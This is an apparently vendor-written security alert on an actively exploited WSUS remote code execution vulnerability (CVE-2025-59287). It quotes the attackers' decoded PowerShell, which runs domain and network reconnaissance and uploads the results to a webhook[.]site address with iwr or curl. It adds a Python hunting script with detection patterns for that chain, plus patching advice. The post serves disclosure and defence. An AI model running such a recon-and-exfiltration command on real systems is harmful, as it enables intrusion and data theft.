
Security alert: WSUS remote code execution vulnerability


· 2 MIN READ · AARON WALTON · OCT 24, 2025

TL;DR

  • A critical vulnerability in Windows Server Update Service (WSUS) is actively under exploitation
  • A patch exists for the vulnerability and should be applied as soon as possible
  • The attack chains observed so far begin with reconnaissance, but other kinds of follow-on activity are just as likely


What happened?

A critical vulnerability—now named CVE-2025-59287—was identified in Windows Server Update Service (WSUS), and attackers are actively exploiting it. The vulnerability impacts internet-exposed servers running WSUS. If the attacker is successful, it allows them to run commands with SYSTEM privileges.

In the incidents we observed, the attacker uses this access to execute PowerShell. The PowerShell command is base64 encoded and decodes to the following commands:

try{$r= (&{echo http[:]//[Victim IP]:8530; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook[.]site/[redacted]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}

The command does the following:

  • Prints the victim’s IP address and WSUS port (8530) so the attacker can find the host again later
  • Checks information about the user accounts in the domain
  • Checks the device’s network configuration settings
  • Packages the output of the first three steps and sends it to webhook[.]site, where the actor can retrieve it later. Webhook[.]site is a legitimate service normally used for testing, but its ability to capture arbitrary HTTP requests can be abused in attacks like this one. In the instances we observed, the data was no longer available on webhook[.]site, which may indicate action taken by the site in response to evidence of abuse.
  • The script first tries to send the data with PowerShell’s Invoke-WebRequest (iwr); if that fails, it falls back to curl.exe to send the same information.

Searching for this type of activity can help identify current ways attackers are exploiting this vulnerability, but it is important to know that other attack chains could be leveraged just as easily. We expect other attackers to target systems in due time.
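As an added example (not Expel’s detection content or tooling), the script below shows one way to hunt for the pattern described above in process-creation telemetry: it unpacks the base64/UTF-16LE payload behind PowerShell’s -EncodedCommand, then looks for the reconnaissance commands (net user /domain, ipconfig /all, the echoed WSUS port) and the exfiltration path (webhook[.]site, iwr with -Body, curl.exe --data-binary). The log line format, host names and sample lines are constructed for illustration; the encoded command is generated from the defanged script quoted in this post.

```python
"""Flag PowerShell process-creation events whose script matches the
recon-then-exfiltrate pattern described in the post.
Added example: log format, host names and sample lines are constructed."""
import base64
import binascii
import re

# Reconnaissance indicators taken from the decoded command in the post.
RECON_PATTERNS = {
    "domain_user_enum": re.compile(r"\bnet\s+user\s+/domain\b", re.I),
    "network_config_enum": re.compile(r"\bipconfig\s+/all\b", re.I),
    "wsus_port_echo": re.compile(r"\becho\s+http\S*:(?:8530|8531)\b", re.I),
}
# Exfiltration indicators: the webhook endpoint plus both upload methods.
EXFIL_PATTERNS = {
    "webhook_site": re.compile(r"webhook\[?\.\]?site", re.I),
    "iwr_upload": re.compile(r"\b(?:iwr|Invoke-WebRequest)\b[^|;]*-Body", re.I),
    "curl_fallback": re.compile(r"\bcurl(?:\.exe)?\s[^|;]*--data-binary", re.I),
}

ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CMDLINE_FIELD = re.compile(r'cmdline="([^"]*)"')   # constructed key=value log format
HOST_FIELD = re.compile(r"\bhost=(\S+)")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or the
    raw command line when it is not encoded or the payload is malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline  # malformed payload: match on whatever is visible


def classify_script(script):
    """Name the matched indicators and give a tiered verdict."""
    recon = [name for name, pat in RECON_PATTERNS.items() if pat.search(script)]
    exfil = [name for name, pat in EXFIL_PATTERNS.items() if pat.search(script)]
    if recon and exfil:
        verdict = "recon_and_exfil"   # the full chain from the post: high signal
    elif recon:
        verdict = "recon_only"        # noisy on its own; admins run these too
    elif exfil:
        verdict = "exfil_only"
    else:
        verdict = None
    return {"recon": recon, "exfil": exfil, "verdict": verdict}


def analyze_log_lines(lines):
    """Return one finding per log line that carries at least one indicator."""
    findings = []
    for line in lines:
        cmd = CMDLINE_FIELD.search(line)
        if not cmd:
            continue
        result = classify_script(decode_encoded_command(cmd.group(1)))
        if result["verdict"] is None:
            continue
        host = HOST_FIELD.search(line)
        result["host"] = host.group(1) if host else "?"
        result["encoded"] = bool(ENCODED_ARG.search(cmd.group(1)))
        findings.append(result)
    return findings


def _enc(powershell):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(powershell.encode("utf-16-le")).decode("ascii")


# The command quoted in the post, defanged and redacted as shown there;
# the victim IP is a constructed placeholder.
OBSERVED_SCRIPT = (
    "try{$r= (&{echo http[:]//10.0.0.5:8530; net user /domain; ipconfig /all} "
    "|out-string)+ $Error }catch{$_.ToString()} ;"
    '$w="http://webhook[.]site/[redacted]";'
    "try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}"
    "catch{curl.exe -k $w --data-binary $r}"
)

# Constructed sample telemetry: one malicious encoded command, one benign
# encoded command, one unencoded admin command that only looks like recon.
SAMPLE_LOG = [
    'ts=2025-10-23T14:02:11Z host=WSUS01 event=ProcessCreate '
    'cmdline="powershell.exe -nop -w hidden -enc ' + _enc(OBSERVED_SCRIPT) + '"',
    'ts=2025-10-23T14:05:40Z host=WSUS01 event=ProcessCreate '
    'cmdline="powershell.exe -enc ' + _enc("Get-Service wuauserv | Select-Object Status") + '"',
    'ts=2025-10-23T14:06:02Z host=ADMIN01 event=ProcessCreate '
    'cmdline="powershell.exe -Command ipconfig /all"',
]

if __name__ == "__main__":
    for finding in analyze_log_lines(SAMPLE_LOG):
        print(finding)
```

The tiered verdict is the point: ipconfig /all or net user /domain alone will fire on ordinary administration, so alert on recon_and_exfil and treat recon_only from a WSUS host as a lead to triage rather than an incident. Real deployments would read Sysmon event 1 or Windows 4688 command lines instead of the constructed key=value format, and should expect the indicators (the webhook host in particular) to change as other actors adopt the vulnerability.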


What should you do right now?

If your organization uses WSUS, it is important to patch servers to the latest version. We recommend doing this even if the WSUS instance isn’t exposed to the internet. Due to accidental misconfigurations or unforeseen situations, these servers could be exposed and become a risk.


Why does it matter?

This vulnerability doesn’t require user interaction and is easily exploitable when the right conditions exist: namely, a WSUS server that is publicly accessible. When exploited, the WSUS server can function as an attacker’s first foothold into a network, granting them the highest possible privileges on the device to continue their attack from there.


What’s next?

We’ll update this post with big developments, but if you or your team have any additional questions regarding this vulnerability or information regarding signs of exploitation, please reach out to us.